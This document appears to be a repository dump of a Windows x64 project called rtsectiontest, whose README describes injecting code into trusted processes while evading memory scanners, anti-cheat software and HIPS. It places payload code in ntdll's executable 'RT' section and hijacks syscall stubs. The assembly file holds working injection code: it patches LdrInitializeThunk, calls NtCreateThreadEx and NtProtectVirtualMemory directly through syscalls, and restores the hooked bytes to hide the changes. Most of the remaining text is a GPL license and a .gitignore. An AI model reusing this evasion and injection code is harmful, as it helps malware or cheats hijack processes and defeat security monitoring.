├── .gitignore
├── LICENSE
├── README.md
├── nextgeninject.zip
├── rtsectiontest.sdf
├── rtsectiontest.sln
├── rtsectiontest
    ├── Libraries
    │   └── myntdll.bin
    ├── auxfuncs.asm
    ├── auxfuncs.h
    ├── auxfuncs_.asm
    ├── global.h
    ├── main.c
    ├── rtsectiontest.vcxproj
    ├── rtsectiontest.vcxproj.filters
    ├── rtsectiontest.vcxproj.user
    └── x64
    │   └── Release
    │       ├── auxfuncs.obj
    │       ├── main.obj
    │       ├── rtsectiontest.Build.CppClean.log
    │       ├── rtsectiontest.log
    │       └── rtsectiontest.tlog
    │           ├── CL.command.1.tlog
    │           ├── CL.read.1.tlog
    │           ├── CL.write.1.tlog
    │           ├── link.command.1.tlog
    │           ├── link.read.1.tlog
    │           ├── link.write.1.tlog
    │           ├── rtsectiontest.lastbuildstate
    │           └── rtsectiontest.write.1u.tlog
└── x64
    └── Release
        ├── rtsectiontest.exe
        ├── rtsectiontest.map
        └── rtsectiontest.pdb


/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | 
  4 | # User-specific files
  5 | *.suo
  6 | *.user
  7 | *.userosscache
  8 | *.sln.docstates
  9 | 
 10 | # User-specific files (MonoDevelop/Xamarin Studio)
 11 | *.userprefs
 12 | 
 13 | # Build results
 14 | [Dd]ebug/
 15 | [Dd]ebugPublic/
 16 | [Rr]elease/
 17 | [Rr]eleases/
 18 | x64/
 19 | x86/
 20 | build/
 21 | bld/
 22 | [Bb]in/
 23 | [Oo]bj/
 24 | 
 25 | # Visual Studo 2015 cache/options directory
 26 | .vs/
 27 | 
 28 | # MSTest test Results
 29 | [Tt]est[Rr]esult*/
 30 | [Bb]uild[Ll]og.*
 31 | 
 32 | # NUNIT
 33 | *.VisualState.xml
 34 | TestResult.xml
 35 | 
 36 | # Build Results of an ATL Project
 37 | [Dd]ebugPS/
 38 | [Rr]eleasePS/
 39 | dlldata.c
 40 | 
 41 | *_i.c
 42 | *_p.c
 43 | *_i.h
 44 | *.ilk
 45 | *.meta
 46 | *.obj
 47 | *.pch
 48 | *.pdb
 49 | *.pgc
 50 | *.pgd
 51 | *.rsp
 52 | *.sbr
 53 | *.tlb
 54 | *.tli
 55 | *.tlh
 56 | *.tmp
 57 | *.tmp_proj
 58 | *.log
 59 | *.vspscc
 60 | *.vssscc
 61 | .builds
 62 | *.pidb
 63 | *.svclog
 64 | *.scc
 65 | 
 66 | # Chutzpah Test files
 67 | _Chutzpah*
 68 | 
 69 | # Visual C++ cache files
 70 | ipch/
 71 | *.aps
 72 | *.ncb
 73 | *.opensdf
 74 | *.sdf
 75 | *.cachefile
 76 | 
 77 | # Visual Studio profiler
 78 | *.psess
 79 | *.vsp
 80 | *.vspx
 81 | 
 82 | # TFS 2012 Local Workspace
 83 | $tf/
 84 | 
 85 | # Guidance Automation Toolkit
 86 | *.gpState
 87 | 
 88 | # ReSharper is a .NET coding add-in
 89 | _ReSharper*/
 90 | *.[Rr]e[Ss]harper
 91 | *.DotSettings.user
 92 | 
 93 | # JustCode is a .NET coding addin-in
 94 | .JustCode
 95 | 
 96 | # TeamCity is a build add-in
 97 | _TeamCity*
 98 | 
 99 | # DotCover is a Code Coverage Tool
100 | *.dotCover
101 | 
102 | # NCrunch
103 | _NCrunch_*
104 | .*crunch*.local.xml
105 | 
106 | # MightyMoose
107 | *.mm.*
108 | AutoTest.Net/
109 | 
110 | # Web workbench (sass)
111 | .sass-cache/
112 | 
113 | # Installshield output folder
114 | [Ee]xpress/
115 | 
116 | # DocProject is a documentation generator add-in
117 | DocProject/buildhelp/
118 | DocProject/Help/*.HxT
119 | DocProject/Help/*.HxC
120 | DocProject/Help/*.hhc
121 | DocProject/Help/*.hhk
122 | DocProject/Help/*.hhp
123 | DocProject/Help/Html2
124 | DocProject/Help/html
125 | 
126 | # Click-Once directory
127 | publish/
128 | 
129 | # Publish Web Output
130 | *.[Pp]ublish.xml
131 | *.azurePubxml
132 | # TODO: Comment the next line if you want to checkin your web deploy settings 
133 | # but database connection strings (with potential passwords) will be unencrypted
134 | *.pubxml
135 | *.publishproj
136 | 
137 | # NuGet Packages
138 | *.nupkg
139 | # The packages folder can be ignored because of Package Restore
140 | **/packages/*
141 | # except build/, which is used as an MSBuild target.
142 | !**/packages/build/
143 | # Uncomment if necessary however generally it will be regenerated when needed
144 | #!**/packages/repositories.config
145 | 
146 | # Windows Azure Build Output
147 | csx/
148 | *.build.csdef
149 | 
150 | # Windows Store app package directory
151 | AppPackages/
152 | 
153 | # Others
154 | *.[Cc]ache
155 | ClientBin/
156 | [Ss]tyle[Cc]op.*
157 | ~$*
158 | *~
159 | *.dbmdl
160 | *.dbproj.schemaview
161 | *.pfx
162 | *.publishsettings
163 | node_modules/
164 | bower_components/
165 | 
166 | # RIA/Silverlight projects
167 | Generated_Code/
168 | 
169 | # Backup & report files from converting an old project file
170 | # to a newer Visual Studio version. Backup files are not needed,
171 | # because we have git ;-)
172 | _UpgradeReport_Files/
173 | Backup*/
174 | UpgradeLog*.XML
175 | UpgradeLog*.htm
176 | 
177 | # SQL Server files
178 | *.mdf
179 | *.ldf
180 | 
181 | # Business Intelligence projects
182 | *.rdl.data
183 | *.bim.layout
184 | *.bim_*.settings
185 | 
186 | # Microsoft Fakes
187 | FakesAssemblies/
188 | 
189 | # Node.js Tools for Visual Studio
190 | .ntvs_analysis.dat
191 | 
192 | # Visual Studio 6 build log
193 | *.plg
194 | 
195 | # Visual Studio 6 workspace options file
196 | *.opt
197 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                     GNU GENERAL PUBLIC LICENSE
  2 |                        Version 2, June 1991
  3 | 
  4 |  Copyright (C) 1989, 1991 Free Software Foundation, Inc., <http://fsf.org/>
  5 |  51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
  6 |  Everyone is permitted to copy and distribute verbatim copies
  7 |  of this license document, but changing it is not allowed.
  8 | 
  9 |                             Preamble
 10 | 
 11 |   The licenses for most software are designed to take away your
 12 | freedom to share and change it.  By contrast, the GNU General Public
 13 | License is intended to guarantee your freedom to share and change free
 14 | software--to make sure the software is free for all its users.  This
 15 | General Public License applies to most of the Free Software
 16 | Foundation's software and to any other program whose authors commit to
 17 | using it.  (Some other Free Software Foundation software is covered by
 18 | the GNU Lesser General Public License instead.)  You can apply it to
 19 | your programs, too.
 20 | 
 21 |   When we speak of free software, we are referring to freedom, not
 22 | price.  Our General Public Licenses are designed to make sure that you
 23 | have the freedom to distribute copies of free software (and charge for
 24 | this service if you wish), that you receive source code or can get it
 25 | if you want it, that you can change the software or use pieces of it
 26 | in new free programs; and that you know you can do these things.
 27 | 
 28 |   To protect your rights, we need to make restrictions that forbid
 29 | anyone to deny you these rights or to ask you to surrender the rights.
 30 | These restrictions translate to certain responsibilities for you if you
 31 | distribute copies of the software, or if you modify it.
 32 | 
 33 |   For example, if you distribute copies of such a program, whether
 34 | gratis or for a fee, you must give the recipients all the rights that
 35 | you have.  You must make sure that they, too, receive or can get the
 36 | source code.  And you must show them these terms so they know their
 37 | rights.
 38 | 
 39 |   We protect your rights with two steps: (1) copyright the software, and
 40 | (2) offer you this license which gives you legal permission to copy,
 41 | distribute and/or modify the software.
 42 | 
 43 |   Also, for each author's protection and ours, we want to make certain
 44 | that everyone understands that there is no warranty for this free
 45 | software.  If the software is modified by someone else and passed on, we
 46 | want its recipients to know that what they have is not the original, so
 47 | that any problems introduced by others will not reflect on the original
 48 | authors' reputations.
 49 | 
 50 |   Finally, any free program is threatened constantly by software
 51 | patents.  We wish to avoid the danger that redistributors of a free
 52 | program will individually obtain patent licenses, in effect making the
 53 | program proprietary.  To prevent this, we have made it clear that any
 54 | patent must be licensed for everyone's free use or not licensed at all.
 55 | 
 56 |   The precise terms and conditions for copying, distribution and
 57 | modification follow.
 58 | 
 59 |                     GNU GENERAL PUBLIC LICENSE
 60 |    TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
 61 | 
 62 |   0. This License applies to any program or other work which contains
 63 | a notice placed by the copyright holder saying it may be distributed
 64 | under the terms of this General Public License.  The "Program", below,
 65 | refers to any such program or work, and a "work based on the Program"
 66 | means either the Program or any derivative work under copyright law:
 67 | that is to say, a work containing the Program or a portion of it,
 68 | either verbatim or with modifications and/or translated into another
 69 | language.  (Hereinafter, translation is included without limitation in
 70 | the term "modification".)  Each licensee is addressed as "you".
 71 | 
 72 | Activities other than copying, distribution and modification are not
 73 | covered by this License; they are outside its scope.  The act of
 74 | running the Program is not restricted, and the output from the Program
 75 | is covered only if its contents constitute a work based on the
 76 | Program (independent of having been made by running the Program).
 77 | Whether that is true depends on what the Program does.
 78 | 
 79 |   1. You may copy and distribute verbatim copies of the Program's
 80 | source code as you receive it, in any medium, provided that you
 81 | conspicuously and appropriately publish on each copy an appropriate
 82 | copyright notice and disclaimer of warranty; keep intact all the
 83 | notices that refer to this License and to the absence of any warranty;
 84 | and give any other recipients of the Program a copy of this License
 85 | along with the Program.
 86 | 
 87 | You may charge a fee for the physical act of transferring a copy, and
 88 | you may at your option offer warranty protection in exchange for a fee.
 89 | 
 90 |   2. You may modify your copy or copies of the Program or any portion
 91 | of it, thus forming a work based on the Program, and copy and
 92 | distribute such modifications or work under the terms of Section 1
 93 | above, provided that you also meet all of these conditions:
 94 | 
 95 |     a) You must cause the modified files to carry prominent notices
 96 |     stating that you changed the files and the date of any change.
 97 | 
 98 |     b) You must cause any work that you distribute or publish, that in
 99 |     whole or in part contains or is derived from the Program or any
100 |     part thereof, to be licensed as a whole at no charge to all third
101 |     parties under the terms of this License.
102 | 
103 |     c) If the modified program normally reads commands interactively
104 |     when run, you must cause it, when started running for such
105 |     interactive use in the most ordinary way, to print or display an
106 |     announcement including an appropriate copyright notice and a
107 |     notice that there is no warranty (or else, saying that you provide
108 |     a warranty) and that users may redistribute the program under
109 |     these conditions, and telling the user how to view a copy of this
110 |     License.  (Exception: if the Program itself is interactive but
111 |     does not normally print such an announcement, your work based on
112 |     the Program is not required to print an announcement.)
113 | 
114 | These requirements apply to the modified work as a whole.  If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works.  But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 | 
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 | 
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 | 
134 |   3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 | 
138 |     a) Accompany it with the complete corresponding machine-readable
139 |     source code, which must be distributed under the terms of Sections
140 |     1 and 2 above on a medium customarily used for software interchange; or,
141 | 
142 |     b) Accompany it with a written offer, valid for at least three
143 |     years, to give any third party, for a charge no more than your
144 |     cost of physically performing source distribution, a complete
145 |     machine-readable copy of the corresponding source code, to be
146 |     distributed under the terms of Sections 1 and 2 above on a medium
147 |     customarily used for software interchange; or,
148 | 
149 |     c) Accompany it with the information you received as to the offer
150 |     to distribute corresponding source code.  (This alternative is
151 |     allowed only for noncommercial distribution and only if you
152 |     received the program in object code or executable form with such
153 |     an offer, in accord with Subsection b above.)
154 | 
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it.  For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable.  However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 | 
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 | 
172 |   4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License.  Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 | 
180 |   5. You are not required to accept this License, since you have not
181 | signed it.  However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works.  These actions are
183 | prohibited by law if you do not accept this License.  Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 | 
189 |   6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions.  You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 | 
197 |   7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License.  If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all.  For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 | 
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 | 
215 | It is not the purpose of this section to induce you to infringe any
216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices.  Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 | 
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 | 
229 |   8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded.  In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 | 
237 |   9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time.  Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 | 
242 | Each version is given a distinguishing version number.  If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation.  If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 | 
250 |   10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission.  For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this.  Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 | 
258 |                             NO WARRANTY
259 | 
260 |   11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 | 
270 |   12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 | 
280 |                      END OF TERMS AND CONDITIONS
281 | 
282 |             How to Apply These Terms to Your New Programs
283 | 
284 |   If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 | 
288 |   To do so, attach the following notices to the program.  It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 | 
293 |     {description}
294 |     Copyright (C) {year}  {fullname}
295 | 
296 |     This program is free software; you can redistribute it and/or modify
297 |     it under the terms of the GNU General Public License as published by
298 |     the Free Software Foundation; either version 2 of the License, or
299 |     (at your option) any later version.
300 | 
301 |     This program is distributed in the hope that it will be useful,
302 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
303 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
304 |     GNU General Public License for more details.
305 | 
306 |     You should have received a copy of the GNU General Public License along
307 |     with this program; if not, write to the Free Software Foundation, Inc.,
308 |     51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 | 
310 | Also add information on how to contact you by electronic and paper mail.
311 | 
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 | 
315 |     Gnomovision version 69, Copyright (C) year name of author
316 |     Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 |     This is free software, and you are welcome to redistribute it
318 |     under certain conditions; type `show c' for details.
319 | 
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License.  Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 | 
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary.  Here is a sample; alter the names:
328 | 
329 |   Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 |   `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 | 
332 |   {signature of Ty Coon}, 1 April 1989
333 |   Ty Coon, President of Vice
334 | 
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs.  If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library.  If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 | 
341 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # rtsectiontest
 2 | An Attempt to Bypass Memory Scanners By Misusing the ntdll.dll "RT" Section.
 3 | 
 4 | SEE WINDOWS 10 10525+ ISSUE!!!
 5 | 
 6 | See also branch "rtsectiontest_2"!
 7 | 
 8 | 
 9 | The rtsectiontest project attempts to trick (simple) memory/hook scanners by neither leaving any memory protection alternation nor any additional RX/RWX memory, whether the scanners are used on demand or employed inside anti cheat software.
10 | In order to do this, it tries to place the payload code within the last 2 KB of an undocumented section "RT" of ntdll.dll in the VA space of any arbitrary non-protected (yet trusted) process, whose name may be specified in a #define statement.
11 | The "RT" section is 4 KB in size and executable by default.
12 | 
13 | Moreover, it tries to keep a low profile while attempting to gain trusted process control by letting x64 HIPS only see the occurrence of an NtOpenProcess call. 
14 | First time execution of arbitrary code is triggered using syscall stub hijacking in order to then force silent creation of a dedicated payload thread.
15 | Due to the small section size as well as the required bootstrap code, any payload code should fit into 2 KB.
16 | 
17 | By elaboratedly using the Windows thread pool facility the remote code execution is now immediate and does not need
18 | to wait anymore until a particular syscall stub is being called.
19 | 
20 | NOTE: The payload code still consists of nothing than a single "EB FE" instruction. Furthermore there is still lack of an interface for adding code in C format.
21 | 
22 | Quick edit: C interface with basic low level debug output implemented.
23 | Detection again checked against WIN64AST for Windows 10, now only
24 | found "NtOpenProcess(..., PROCESS_ALL_ACCESS,...)" detection, nothing further.
25 | 
26 | Code way too large to fit in 2kb of rt section.
27 | 


--------------------------------------------------------------------------------
/nextgeninject.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/nextgeninject.zip


--------------------------------------------------------------------------------
/rtsectiontest.sdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest.sdf


--------------------------------------------------------------------------------
/rtsectiontest.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 14
 4 | VisualStudioVersion = 14.0.23107.0
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rtsectiontest", "rtsectiontest\rtsectiontest.vcxproj", "{16086A51-3A9D-41EF-B34B-1382E6EE808D}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Release|x64 = Release|x64
11 | 	EndGlobalSection
12 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 | 		{16086A51-3A9D-41EF-B34B-1382E6EE808D}.Release|x64.ActiveCfg = Release|x64
14 | 		{16086A51-3A9D-41EF-B34B-1382E6EE808D}.Release|x64.Build.0 = Release|x64
15 | 	EndGlobalSection
16 | 	GlobalSection(SolutionProperties) = preSolution
17 | 		HideSolutionNode = FALSE
18 | 	EndGlobalSection
19 | EndGlobal
20 | 


--------------------------------------------------------------------------------
/rtsectiontest/Libraries/myntdll.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/Libraries/myntdll.bin


--------------------------------------------------------------------------------
/rtsectiontest/auxfuncs.asm:
--------------------------------------------------------------------------------
  1 | ;extrn NtSuspendProcess: PROC
  2 | ;extrn LdrInitializeThunk: PROC
  3 | .code
  4 | mymemcmp PROC
  5 | 	push rsi
  6 | 	push rdi
  7 | 	mov rsi, rcx
  8 | 	mov rdi, rdx
  9 | 	mov rcx, r8
 10 | 	cld
 11 | 	cmp rcx, rcx
 12 | 	repe cmpsb
 13 | 	setz al
 14 | 	pop rdi
 15 | 	pop rsi
 16 | 	ret
 17 | mymemcmp ENDP
 18 | 
 19 | .data
 20 | injectionCode PROC
 21 | 	db 0E8h
 22 | 	dd 0BBBBBBBBh
 23 | injectionCode ENDP
 24 | 
 25 | ;fpBootstrapRoutine PROC
 26 | bootstrapRoutineBegin PROC
 27 | bootstrapRoutineBegin ENDP
 28 | 	push rbx
 29 | 	mov rax, qword ptr [rsp+8]
 30 | 	sub rax, 5
 31 | 	mov qword ptr [rsp+8], rax
 32 | 	dw 0BB48h	;movabs rbx, ?
 33 | originalSyscallCode PROC
 34 | 		dq 0CCCCCCCCCCCCCCCCh
 35 | originalSyscallCode ENDP
 36 | 	lock xchg qword ptr [rax], rbx
 37 | 	xor rax, rax
 38 | 	mov rax, qword ptr gs:[rax+60h]
 39 | 	mov rax, qword ptr [rax+10h]
 40 | 	mov ebx, dword ptr [rax+3Ch]
 41 | 	add rax, rbx
 42 | 	pop rbx
 43 | 	cmp word ptr [rax+4], 8664h
 44 | 	jne iswow64
 45 | 	cmp word ptr [rax+18h], 20Bh
 46 | 	je isamd64
 47 | iswow64:
 48 | 	;ret
 49 | isamd64:
 50 | 	push rcx
 51 | 	push rdx
 52 | 	push r8
 53 | 	push r9
 54 | 	sub rsp, 20h
 55 | 	;lea rcx, NtSuspendProcess ;(this is Not pic code!)
 56 | 	;int 3
 57 | 	;or r10,-1
 58 | 	;mov eax, 161h
 59 | 	call fpCreatePayloadThread
 60 | 	;syscall
 61 | 	;looooop:
 62 | 	;jmp looooop
 63 | 
 64 | 	add rsp, 20h
 65 | 	pop r9
 66 | 	pop r8
 67 | 	pop rdx
 68 | 	pop rcx
 69 | 	ret
 70 | ;fpBootstrapRoutine ENDP
 71 | 
 72 | syscallStub PROC
 73 | 	mov eax, ecx
 74 | 	mov r10, rdx
 75 | 	mov rdx, r8
 76 | 	mov r8, r9
 77 | 	mov r9, qword ptr [rsp+28h]
 78 | 	add rsp, 8h
 79 | 	nop
 80 | 	syscall
 81 | 	sub rsp, 8h
 82 | 	ret
 83 | syscallStub ENDP
 84 | 
 85 | fpCreatePayloadThread PROC
 86 | createPayloadThreadBegin PROC
 87 | createPayloadThreadBegin ENDP
 88 | 	mov r11, rsp
 89 | 	sub rsp, 68h
 90 | 	xor eax, eax
 91 | 	lea rdx, [r11+10h]
 92 | 	mov qword ptr [r11-10h], rax
 93 | 	xor r9d, r9d
 94 | 	mov qword ptr [r11-18h], rax
 95 | 	mov r8d, 1fffffh
 96 | 	mov qword ptr [r11-20h], rax
 97 | 	mov qword ptr [r11-28h], rax
 98 | 	mov qword ptr [r11-30h], rax
 99 | 	or rax, -1
100 | 	mov qword ptr [r11-38h], rax
101 | 	mov qword ptr [r11-48h], rax
102 | 	mov rcx, qword ptr [ldrInitializeThunkAddr]
103 | 	lea rax, looop
104 | 	sub rax, rcx
105 | 	sub rax, 5
106 | 	mov byte ptr [r11-40h], 0E9h
107 | 	mov dword ptr [r11-3Fh], eax
108 | 	mov rax, rcx
109 | 	mov rcx, qword ptr [rcx]
110 | 	mov qword ptr [originalLdrInitThunk], rcx
111 | 	mov rcx, qword ptr [r11-40h]
112 | 	lock xchg qword ptr [rax], rcx
113 | 	db 0B9h
114 | ntCreateThreadExNumber PROC
115 | 	dd 0DDDDDDDDh
116 | ntCreateThreadExNumber ENDP
117 | 	call syscallStub
118 | 	add rsp, 68h
119 | 	ret
120 | fpCreatePayloadThread ENDP
121 | createPayloadThreadEnd PROC
122 | createPayloadThreadEnd ENDP
123 | ldrInitializeThunkAddr PROC
124 | 	dq 0CCCCCCCCCCCCCCCCh	;;&ntdll!LdrInitializeThunk
125 | ldrInitializeThunkAddr ENDP
126 | ntdllRxBasePriv:
127 | ntdllRxBaseAddr PROC
128 | 	dq 1111111111111111h	;;pNtdllRxBase
129 | ntdllRxBaseAddr ENDP
130 | protSizePriv:
131 | protSize PROC
132 | 	dq 5555555555555555h	;;bytesToProtect
133 | protSize ENDP
134 | origProtPriv:
135 | origProt PROC
136 | 	dd 44444444h			;;oldProt
137 | origProt ENDP
138 | 	originalLdrInitThunk dq 9999999999999999h
139 | looop:
140 | 	mov rax, qword ptr [originalLdrInitThunk]
141 | 	mov rcx, qword ptr [ldrInitializeThunkAddr]
142 | 	lock xchg qword ptr [rcx], rax
143 | 	sub rsp, 50h
144 | 	or rdx, -1
145 | 	mov rax, qword ptr [ntdllRxBasePriv]
146 | 	mov [rsp+38h], rax
147 | 	lea r8, [rsp+38h]
148 | 	mov rax, qword ptr [protSizePriv]
149 | 	mov [rsp+40h], rax
150 | 	lea r9, [rsp+40h]
151 | 	mov ecx, dword ptr [origProtPriv]
152 | 	mov dword ptr [rsp+20h], ecx
153 | 	lea rcx, [rsp+30h]
154 | 	mov qword ptr [rsp+28h], rcx
155 | 	db 0B9h
156 | ntProtectVirtMemNumber PROC
157 | 	dd 033333333h			;;((PNT_SYSCALL_STUB)&NtProtectVirtualMemory)->syscallNr
158 | ntProtectVirtMemNumber ENDP
159 | 	call syscallStub
160 | 	add rsp, 50h
161 | 	;status = NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, PAGE_EXECUTE_READWRITE, &oldHookProtect);
162 | 	;int 3
163 | 	or r10,-1
164 | 	mov eax, 161h
165 | 	syscall
166 | loooop:
167 | 	jmp loooop
168 | bootstrapRoutineEnd PROC
169 | bootstrapRoutineEnd ENDP
170 | ;fpCreatePayloadThread:
171 | END
172 | 


--------------------------------------------------------------------------------
/rtsectiontest/auxfuncs.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | //extern NTSTATUS syscallStub(ULONG syscallNum, ...);
 3 | //__forceinline extern void myTerminate(void);
 4 | extern BOOLEAN mymemcmp(PVOID src1, PVOID src2, SIZE_T length);
 5 | extern ULONG injectionCode;
 6 | extern ULONG_PTR originalSyscallCode;
 7 | extern void fpCreatePayloadThread(ULONG_PTR payloadCodeAddress);
 8 | //extern void fpBootstrapRoutine(void);
 9 | extern PVOID createPayloadThreadBegin;
10 | extern PVOID createPayloadThreadEnd;
11 | extern UCHAR bootstrapRoutineBegin;
12 | extern UCHAR bootstrapRoutineEnd;
13 | extern SIZE_T protSize;
